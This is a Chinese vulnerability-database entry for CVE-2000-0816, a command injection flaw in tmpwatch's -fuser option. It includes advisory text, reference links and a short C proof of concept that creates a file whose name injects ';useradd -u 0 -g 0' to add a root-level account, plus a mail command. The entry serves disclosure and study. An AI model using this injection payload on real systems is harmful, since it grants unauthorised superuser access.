Tmpwatch任意命执行漏洞

Tmpwatch任意命执行漏洞

漏洞ID 1106029 漏洞类型 输入验证
发布时间 2000-10-06 更新时间 2005-05-02
图片[1]-Tmpwatch任意命执行漏洞-安全小百科CVE编号 CVE-2000-0816
图片[2]-Tmpwatch任意命执行漏洞-安全小百科CNNVD-ID CNNVD-200010-001
漏洞平台 Linux CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/20285
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-001
|漏洞详情
Linuxtmpwatch–fuser选项存在漏洞。本地用户通过创建文件名包含shell元字符的文件执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/1785/info

A vulnerability exists in tmpwatch, a utility which automates the removal of temporary files in unix-like systems. An optional component of tmpwatch, fuser, improperly handles arguments to system() library calls. If an attacker creates a file with a maliciously-constructed filename including shell meta characters, and -fuser is run on this file, the attacker may be able to execute arbitrary commands, potentially compromising superuser access if tmpwatch is run with root privileges.

#include <stdio.h>

int main()
{
   FILE *f;
   char filename[100] = ";useradd -u 0 -g 0 haks0r;mail 
[email protected]<blablabla";

   if((f = fopen(filename, "a")) == 0) {
      perror("Could not create file");
      exit(1);
   }
   close(f);
}
|参考资料

来源:ISS
名称:20001006InsecurecallofexternalprogramsinRedHatLinuxtmpwatch
链接:http://xforce.iss.net/alerts/advise64.php
来源:XF
名称:linux-tmpwatch-fuser(5320)
链接:http://xforce.iss.net/xforce/xfdb/5320
来源:BID
名称:1785
链接:http://www.securityfocus.com/bid/1785
来源:REDHAT
名称:RHSA-2000:080
链接:http://www.redhat.com/support/errata/RHSA-2000-080.html
来源:MANDRAKE
名称:MDKSA-2000:056
链接:http://www.linux-mandrake.com/en/security/MDKSA-2000-056.php3?dis=7.1

相关推荐: Multiple Geeklog Vulnerabilities

Multiple Geeklog Vulnerabilities 漏洞ID 1099537 漏洞类型 Input Validation Error 发布时间 2003-09-29 更新时间 2003-09-29 CVE编号 N/A CNNVD-ID N/A 漏…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享